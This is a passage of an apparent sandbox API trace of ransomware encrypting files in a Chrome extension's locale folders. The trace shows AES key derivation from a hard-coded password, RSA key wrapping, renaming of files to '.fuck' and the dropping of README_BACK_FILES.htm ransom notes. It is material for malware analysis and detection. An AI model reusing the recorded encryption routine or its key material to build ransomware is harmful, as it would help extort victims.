lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.945] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.946] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d120) returned 1 [0252.949] CryptCreateHash (in: hProv=0x298d120, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.949] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0252.949] CryptHashData (hHash=0x29846a0, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.949] CryptDeriveKey (in: hProv=0x298d120, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984b20) returned 1 [0252.949] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.949] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.949] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298d1a8) returned 1 [0252.949] CryptImportPublicKeyInfo (in: hCryptProv=0x298d1a8, dwCertEncodingType=0x1, pInfo=0x2993e30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2993e60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2993e68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984b60) returned 1 [0252.949] CryptEncrypt (in: hKey=0x2984b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.950] CryptEncrypt (in: hKey=0x2984b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298d010*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298d010*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.950] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298d010*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298d010*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.951] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe5, lpOverlapped=0x0) returned 1 [0252.952] CryptEncrypt (in: hKey=0x2984b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe5, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0252.952] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0252.952] CloseHandle (hObject=0x5d60) returned 1 [0252.952] CloseHandle (hObject=0x5d5c) returned 1 [0252.953] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json"), bFailIfExists=0) returned 1 [0252.956] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json", dwFileAttributes=0x0) returned 1 [0252.957] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.gsg")) returned 1 [0252.958] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.fuck")) returned 1 [0252.959] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.960] CryptDestroyKey (hKey=0x2984b20) returned 1 [0252.960] CryptReleaseContext (hProv=0x298d120, dwFlags=0x0) returned 1 [0252.960] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.960] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0252.960] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\readme_back_files.htm")) returned 0xffffffff [0252.960] AreFileApisANSI () returned 1 [0252.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0252.960] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0252.961] GetFileType (hFile=0x5d50) returned 0x1 [0252.961] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.962] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.963] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0252.963] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.963] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.963] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.963] GetLastError () returned 0x0 [0252.964] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json")) returned 0x20 [0252.964] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json", dwFileAttributes=0x80) returned 1 [0252.964] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.965] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.967] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.967] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d3c8) returned 1 [0252.970] CryptCreateHash (in: hProv=0x298d3c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.970] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0252.970] CryptHashData (hHash=0x29846a0, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.970] CryptDeriveKey (in: hProv=0x298d3c8, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984b20) returned 1 [0252.970] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.970] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.970] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298d120) returned 1 [0252.971] CryptImportPublicKeyInfo (in: hCryptProv=0x298d120, dwCertEncodingType=0x1, pInfo=0x2993f00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2993f30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2993f38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29848e0) returned 1 [0252.971] CryptEncrypt (in: hKey=0x29848e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.971] CryptEncrypt (in: hKey=0x29848e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298d230*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298d230*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.971] WriteFile (in: hFile=0x5d60, lpBuffer=0x298d230*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298d230*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.972] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xda, lpOverlapped=0x0) returned 1 [0252.974] CryptEncrypt (in: hKey=0x2984b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xda, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0252.974] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0252.974] CloseHandle (hObject=0x5d5c) returned 1 [0252.974] CloseHandle (hObject=0x5d60) returned 1 [0252.974] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json"), bFailIfExists=0) returned 1 [0252.978] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json", dwFileAttributes=0x0) returned 1 [0252.979] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.gsg")) returned 1 [0252.980] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.fuck")) returned 1 [0252.981] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.981] CryptDestroyKey (hKey=0x2984b20) returned 1 [0252.981] CryptReleaseContext (hProv=0x298d3c8, dwFlags=0x0) returned 1 [0252.981] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.982] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0252.982] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\readme_back_files.htm")) returned 0xffffffff [0252.982] AreFileApisANSI () returned 1 [0252.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0252.982] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0252.983] GetFileType (hFile=0x5d50) returned 0x1 [0252.983] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.984] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.984] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0252.984] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.984] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.984] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.984] GetLastError () returned 0x0 [0252.985] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json")) returned 0x20 [0252.985] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json", dwFileAttributes=0x80) returned 1 [0252.986] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.987] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.988] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.988] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d3c8) returned 1 [0252.990] CryptCreateHash (in: hProv=0x298d3c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.990] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0252.990] CryptHashData (hHash=0x29846a0, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.990] CryptDeriveKey (in: hProv=0x298d3c8, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984b20) returned 1 [0252.990] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.991] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.991] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298d560) returned 1 [0252.991] CryptImportPublicKeyInfo (in: hCryptProv=0x298d560, dwCertEncodingType=0x1, pInfo=0x2993fd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2994000*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2994008*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984ba0) returned 1 [0252.991] CryptEncrypt (in: hKey=0x2984ba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.991] CryptEncrypt (in: hKey=0x2984ba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298d5e8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298d5e8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.991] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298d5e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298d5e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.992] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xcf, lpOverlapped=0x0) returned 1 [0252.993] CryptEncrypt (in: hKey=0x2984b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xcf, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0252.993] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, 